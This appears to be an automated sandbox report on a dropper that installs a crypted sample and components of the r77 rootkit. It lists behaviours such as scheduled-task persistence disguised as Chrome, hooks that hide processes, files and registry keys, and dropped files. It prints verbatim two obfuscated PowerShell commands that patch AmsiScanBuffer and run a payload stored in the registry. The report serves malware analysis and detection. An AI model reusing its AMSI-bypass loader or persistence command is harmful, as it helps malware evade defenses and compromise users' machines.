Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\InstallStager\obj\x64\Release\InstallStager.pdb source: 34432.exe, 00000004.00000002.361388892.0000000013A39000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.360948518.0000000013998000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356818562.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000002.356782565.0000000003991000.00000004.00000800.00020000.00000000.sdmp, 34432.exe, 00000004.00000003.333426645.000000001C445000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.468321947.000002C8EBC93000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000002.225232923.0000000000113000.00000004.00000010.00020000.00000000.sdmp, ChiefKeefofficialnaxyi_crypted(6).exe, 00000002.00000003.224694291.0000000002672000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmp
Source: Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe
Source: Binary string: RYPTOCOIN\rootkit\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: svchost.exe

Data Obfuscation

barindex
.NET source code contains potential unpacker
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.AppLaunch.exe.400000.0.unpack, u0003u2001.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: NewEngineState=Availablefunction Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: $global:?function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDyn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell logging: {$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)
Obfuscated command line found
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E40070C pushad ; ret
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E4006CE pushad ; ret
Source: C:\Users\user\AppData\Roaming\34432.exeCode function: 4_2_00007FFF7E4035CF push cs; iretd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F7317 push ebx; iretd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F5097 push eax; iretd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E3F44E7 push esp; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E4C5274 pushad ; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E4C5F76 push ebx; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E4C5C3C push esi; retf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFF7E4C6156 push ecx; retf
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000E228 push rax; retf
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014001439D push rcx; retf 003Fh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFF7E3E6450 push ebx; iretd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFF7E3E41C7 push esp; retf
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F070C pushad ; ret
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F06CE pushad ; ret
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F70FA push ebp; retf
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 30_2_00007FFF7E3F35CF push cs; iretd
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E40070C pushad ; ret
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E4006CE pushad ; ret
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeCode function: 33_2_00007FFF7E4035CF push cs; iretd
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400146AD push rcx; retf 003Fh
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000E348 push rax; retf
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000E350 push rax; retf
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDCE94CD push rcx; retf 003Fh
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD142D8 push rax; retf
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD1A6CD push rcx; retf 003Fh
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2B994CD push rcx; retf 003Fh
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BC42D8 push rax; retf
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3CE94CD push rcx; retf 003Fh
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D142D0 push rax; retf
Source: ChiefKeefofficialnaxyi_crypted(6).exe.1.drStatic PE information: section name: .nQuHRq
Source: ChiefKeefofficialnaxyi_crypted(6).exe.1.drStatic PE information: section name: .9SAT
Source: initial sampleStatic PE information: section name: .9SAT entropy: 6.83589844593

Persistence and Installation Behavior

barindex
Creates files in the system32 config directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Source: C:\Users\user\Desktop\Install.exeFile created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\34432.exeFile created: C:\Users\user\AppData\Roaming\Chrome\chrome.exeJump to dropped file
Source: C:\Users\user\Desktop\Install.exeFile created: C:\Users\user\AppData\Roaming\34432.exeJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Windows\System32\nslookup.exeFile created: C:\Windows\Tasks\nslooksvc32.job

Hooking and other Techniques for Hiding and Protection

barindex
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Hooks processes query functions (used to hide processes)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Hooks files or directories query functions (used to hide files and directories)
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x93 0x33 0x35 0x5D 0xDF
Source: C:\Windows\System32\nslookup.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node nslookstager
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD01F20 GetCurrentThread,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Install.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOX
